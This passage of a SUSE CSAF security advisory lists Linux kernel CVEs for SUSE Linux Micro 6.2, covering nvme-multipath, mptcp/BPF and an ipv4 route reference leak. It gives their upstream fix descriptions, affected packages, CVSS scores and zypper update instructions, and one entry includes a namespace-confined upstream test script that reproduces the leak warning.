"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68211",
"url": "https://www.suse.com/security/cve/CVE-2025-68211"
},
{
"category": "external",
"summary": "SUSE Bug 1255319 for CVE-2025-68211",
"url": "https://bugzilla.suse.com/1255319"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68211"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
